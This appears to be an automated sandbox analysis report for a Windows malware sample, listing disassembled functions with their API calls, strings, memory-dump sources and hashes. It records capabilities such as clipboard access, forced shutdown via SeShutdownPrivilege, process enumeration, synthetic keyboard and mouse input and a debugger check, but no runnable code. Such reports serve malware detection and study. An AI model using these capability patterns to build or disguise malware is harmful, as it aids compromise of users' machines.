Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: e0523f7bed01ebcb8b4a2aa16a2910c601aca03e2b8d3539bc9d2effc29758e0
Instruction ID: 22ee85f5f2cc8644fc9400b264648f3b26fe9f2cbb2f8a3b83f359374339d4cb
Opcode Fuzzy Hash: e0523f7bed01ebcb8b4a2aa16a2910c601aca03e2b8d3539bc9d2effc29758e0
Instruction Fuzzy Hash: 0AD15072508340AFC314EBA4D896EABB7ECEF88704F44495DF589C7191EB34DA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 029EAB31 Relevance: 16.6, Strings: 9, Instructions: 5385COMMON

Download Yara Rule

Strings

], xrefs: 029EAC60
:, xrefs: 029EAC1A
9, xrefs: 029EAC38
{, xrefs: 029EAC10
}, xrefs: 02A29ACD
\NL, xrefs: 02A27F74
', xrefs: 029EAC42
", xrefs: 02A29578
0, xrefs: 029EAC2E

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: "$'$0$9$:$\NL$]${$}
API String ID: 0-3286379650
Opcode ID: 70b51c61ce3b28379b7168ed3fc1a4dd8ae338b5dc462b43de5506081808ceb2
Instruction ID: 32ed35e079addde5091d7589146e9a225515d5971f6fdddb2d65b1abc7367eb1
Opcode Fuzzy Hash: 70b51c61ce3b28379b7168ed3fc1a4dd8ae338b5dc462b43de5506081808ceb2
Instruction Fuzzy Hash: 0593B175E00226DFDF24CF9CC8907ADB7B1FF48714F24856AE945AB281EB709985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B8ED91
EmptyClipboard.USER32 ref: 00B8ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00B8EDAC
CloseClipboard.USER32 ref: 00B8EEA3

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 437bef707dfc0d2e531f8fee25ce31f0ad52a63aef78ed3c291aa554d3ccd766
Instruction ID: b773229ac2e0aba4ca77a00dde91ea998bdf9daba6762d364467dd4f2a45ac45
Opcode Fuzzy Hash: 437bef707dfc0d2e531f8fee25ce31f0ad52a63aef78ed3c291aa554d3ccd766
Instruction Fuzzy Hash: 7A418B35204611AFE720EF19D889B59BFE5EF45329F14C099E4298B6B2CB35EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B7170D
Part of subcall function 00B716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B7173A
Part of subcall function 00B716C3: GetLastError.KERNEL32 ref: 00B7174A

ExitWindowsEx.USER32(?,00000000), ref: 00B7E932

Strings

SeShutdownPrivilege, xrefs: 00B7E902
, xrefs: 00B7E95C
, xrefs: 00B7E920
@, xrefs: 00B7E925

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 51ad9c7a0ec644839cba4ea18219d012a6e11ea629964d44f56bdc3f2dc00057
Instruction ID: 999013227ba1fe247a265cb9c389587aa12f1b914524934cd199d664dae875ce
Opcode Fuzzy Hash: 51ad9c7a0ec644839cba4ea18219d012a6e11ea629964d44f56bdc3f2dc00057
Instruction Fuzzy Hash: 5D01D0736102116BE75426789C8ABBB76DCDF18750F1584D2F937E31D1D6709C404194

Uniqueness

Uniqueness Score: -1.00%

Function 00B4E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B4E645

Strings

1#IND, xrefs: 00B4F83D
1#INF, xrefs: 00B4F852
1#SNAN, xrefs: 00B4F844
1#QNAN, xrefs: 00B4F84B

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1f65f358428bf57a944d37e08fdab87e7588392f5885349a6f92b82e50fba368
Instruction ID: 9b4e949501f3976a07ebb0d57867ed0965338035337a0e836bb68ab08ec1179e
Opcode Fuzzy Hash: 1f65f358428bf57a944d37e08fdab87e7588392f5885349a6f92b82e50fba368
Instruction Fuzzy Hash: B8C22872E086298FDB25CE289D807EAB7F5FB48304F1541EAD85DE7241E774AE819F40

Uniqueness

Uniqueness Score: -1.00%

Function 00B8648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B864DC
CoInitialize.OLE32(00000000), ref: 00B86639
CoCreateInstance.OLE32(00BAFCF8,00000000,00000001,00BAFB68,?), ref: 00B86650
CoUninitialize.OLE32 ref: 00B868D4

Strings

.lnk, xrefs: 00B864BA, 00B86524, 00B865E0

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 08db5d95a095ac803a5d30dd13f80ec4afa022e4fe5db262c90f52d0f2bdc54b
Instruction ID: d2d28906ed4f67971183903d0e7575005ba447b9cbce65aa3a078c77ebb2cd93
Opcode Fuzzy Hash: 08db5d95a095ac803a5d30dd13f80ec4afa022e4fe5db262c90f52d0f2bdc54b
Instruction Fuzzy Hash: A3D14A71508341AFC304EF24C8919ABB7E9FF98704F5049ADF5958B2A1EB70ED49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B922E8

Part of subcall function 00B8E4EC: GetWindowRect.USER32(?,?), ref: 00B8E504

GetDesktopWindow.USER32 ref: 00B92312
GetWindowRect.USER32(00000000), ref: 00B92319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B92355
GetCursorPos.USER32(?), ref: 00B92381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B923DF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 67a5824ed747dd47b1d4d4b2366b9671ad395468baa78695c3a2db32450d4ffc
Instruction ID: 8f96e0babfbe02c607243e3c94f6a3381b84bddc74a1e236e99b6e67f082c492
Opcode Fuzzy Hash: 67a5824ed747dd47b1d4d4b2366b9671ad395468baa78695c3a2db32450d4ffc
Instruction Fuzzy Hash: 7631E572908315AFCB20DF14D84AF5BBBE9FF89310F000969F59997191DB34E908CB95

Uniqueness

Uniqueness Score: -1.00%

Function 029D7460 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 02A151F0
VUUU, xrefs: 029D77E8
ERCP, xrefs: 029D753C
VUUU, xrefs: 029D77FA
VUUU, xrefs: 029D783C

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 9353be4427922f656bbdffcd0410a08b7ede3d0ebae8a32ff62f4f36be3f1590
Instruction ID: 36900eaa2c14ce180a46318be0097d0917c2ab6d03aab3652e18ab3289c56ef5
Opcode Fuzzy Hash: 9353be4427922f656bbdffcd0410a08b7ede3d0ebae8a32ff62f4f36be3f1590
Instruction Fuzzy Hash: BFA25175E0021ACBDF24CF98C9807EDB7B2BF84324F54859AD815A7284EB749E81DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B18060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00B1813C
VUUU, xrefs: 00B1843C
VUUU, xrefs: 00B55DF0
VUUU, xrefs: 00B183FA
VUUU, xrefs: 00B183E8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: b57832a6e430ce2098d569547a1683d535142a4bd1a00a3d41e3d68c0f674cc7
Instruction ID: 0244b63102c0df18294e783d7b4f78677848c12b47254b610e17fd8ecd26fa70
Opcode Fuzzy Hash: b57832a6e430ce2098d569547a1683d535142a4bd1a00a3d41e3d68c0f674cc7
Instruction Fuzzy Hash: 5CA22971A0061ACBDF24CF58C8907EEB7F2FB54311FA481E9EC15A7285EB749D858B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B9A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B9A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00B9A6BA

Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD

Process32NextW.KERNEL32(00000000,?), ref: 00B9A79C
CloseHandle.KERNEL32(00000000), ref: 00B9A7AB

Part of subcall function 00B2CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B53303,?), ref: 00B2CE8A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 6c64541667ca8755e6a997f5c7525ab9539978b7d37440bc5a038d9ba2007ac3
Instruction ID: cdb99bdd58a474eda31d1a95c12298440f8943ac855d536a76af87448f45926d
Opcode Fuzzy Hash: 6c64541667ca8755e6a997f5c7525ab9539978b7d37440bc5a038d9ba2007ac3
Instruction Fuzzy Hash: 78516D71508300AFD710EF24D886AABBBF8FF89754F40896DF58997251EB30E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B7AAAC
SetKeyboardState.USER32(00000080), ref: 00B7AAC8
PostMessageW.USER32 ref: 00B7AB36
SendInput.USER32(00000001,?,0000001C), ref: 00B7AB88

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 65e8b61b313c55c06dcbac54aedd0f9df6567b744b3e96b02c13b44eb5c222f4
Instruction ID: 9f8e5493a6ab0a8345bfcb7a292ab7d04a2f1c463126ab8401f0a1d51548d425
Opcode Fuzzy Hash: 65e8b61b313c55c06dcbac54aedd0f9df6567b744b3e96b02c13b44eb5c222f4
Instruction Fuzzy Hash: 89312830A40208AEFF35CA64CC45BFE7BE6EBC5310F04C29AF1A9522D0D7748985C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B78298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B782AA

Strings

|, xrefs: 00B782DA
(, xrefs: 00B782F0

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 3a5faf950936f4ac9914c8e5c543b8dab99d6626dfc202471d29e790f7cc19ff
Instruction ID: 5c701d218d86f31b2c5a96bfb2715ab27c5aaadf6b1e5ee54f91c963267d3c09
Opcode Fuzzy Hash: 3a5faf950936f4ac9914c8e5c543b8dab99d6626dfc202471d29e790f7cc19ff
Instruction Fuzzy Hash: DB323575A007059FCB28CF59C085A6AB7F0FF48710B15C5AEE4AADB7A1EB70E941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00B42622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00B4271A
SetUnhandledExceptionFilter.KERNEL32 ref: 00B42724
UnhandledExceptionFilter.KERNEL32(?), ref: 00B42731

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: bb3a93eb5a6f65459e822be70ddd4d7f5922bd4cff56c646eca786883430b8a1
Instruction ID: 0a1dcb2e210957a1f967fb74647ce70e7e89736a7414e3576e139d49d204ba04
Opcode Fuzzy Hash: bb3a93eb5a6f65459e822be70ddd4d7f5922bd4cff56c646eca786883430b8a1
Instruction Fuzzy Hash: ED31B47495122C9BCB21DF64DD897D9BBF8AF08310F5041EAE41CA7261EB709F819F45

Uniqueness

Uniqueness Score: -1.00%

Function 02A37698 Relevance: 4.3, Strings: 3, Instructions: 568COMMON

Download Yara Rule

Strings

tbL, xrefs: 02A378F4
(, xrefs: 02A376F0
|, xrefs: 02A376DA

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: ($tbL$|
API String ID: 0-2980396599
Opcode ID: 50152e8ac8da47ac1839f5971c8c56cb56cfff71f8c3f79802e25eedfd5605fb
Instruction ID: 4829a0d99990f338f07d777507888af69e1c7633adfdcfe0caddfc574eaad682
Opcode Fuzzy Hash: 50152e8ac8da47ac1839f5971c8c56cb56cfff71f8c3f79802e25eedfd5605fb
Instruction Fuzzy Hash: 803225B5A00605DFCB29CF69C480A6AF7F1FF48710B11C56EE59ADB7A1EB70A941CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B4C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00B4C36C

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 51076bc5e362ad523cdfb93b1fcfa2690a11c9db412de4ae47784943ed9984fe
Instruction ID: 3ef7fa2f25794f591e86001c8827af9b42a4012af7fb9298c156a504a24645cb
Opcode Fuzzy Hash: 51076bc5e362ad523cdfb93b1fcfa2690a11c9db412de4ae47784943ed9984fe
Instruction Fuzzy Hash: E7414772901219AFCB209FB9CC89EBB7BF8EB84714F1042E9F905C7180E6709E80DB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A63C73 Relevance: 3.6, APIs: 2, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54ba311c610d96a54025d81a285f6d236c62b14a21bbc2dc148556a02803cbf
Instruction ID: 32adf2bb8a4a933c3416895b317df013c3e43c61f89b845dda1034512fa1d092
Opcode Fuzzy Hash: f54ba311c610d96a54025d81a285f6d236c62b14a21bbc2dc148556a02803cbf
Instruction Fuzzy Hash: AE12F172600214ABEF358F28DC88FBE7BB9EF89714F04416AF516EA2D0DB749941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 029FBEA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b898cec062c48c3280c8f5a9d772e89547b69b2f16a4579907f23802b1c1323
Instruction ID: 7d8a0c550cfca24b6507b8bb22eb59f7c4ddeeb60fc39fe856439a5a147501be
Opcode Fuzzy Hash: 7b898cec062c48c3280c8f5a9d772e89547b69b2f16a4579907f23802b1c1323
Instruction Fuzzy Hash: D7022D71E002199BDF94CFA9C8806AEFBF5FF88724F15816AD919E7344D731AA41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00B3CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 6473fde9305ef6c553926e98a685ad0c08bc796af8425fe11000362e0fa2146c
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 6B020D72E002299BDF14CFA9C8806ADFBF1EF48314F2581A9D919F7385D731AE458B94

Uniqueness

Uniqueness Score: -1.00%

Function 00B868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B86918
FindClose.KERNEL32(00000000), ref: 00B86961

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 4c9722d78b8942c41c42faab923b8eabd5d680855f674813de0d8329057cb6fa
Instruction ID: 04ba84bac3fcf63afb5398728ea4357148902a9ec8177dd53dcef9adfbbd03b4
Opcode Fuzzy Hash: 4c9722d78b8942c41c42faab923b8eabd5d680855f674813de0d8329057cb6fa
Instruction Fuzzy Hash: 3A119D316042009FC710DF29D889A16BBE5FF89328F54C6A9E4698F7A2CB30EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A0D8FF Relevance: 2.9, APIs: 1, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 02A0DA45

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 0bef3180ed392ec7568cc5422c85607a23a8d3234994752c1b91499844fb3da8
Instruction ID: f5e2534d89283a9b369d1c88703e525cbc88e159ee9702cbe234a3ffcb12db39
Opcode Fuzzy Hash: 0bef3180ed392ec7568cc5422c85607a23a8d3234994752c1b91499844fb3da8
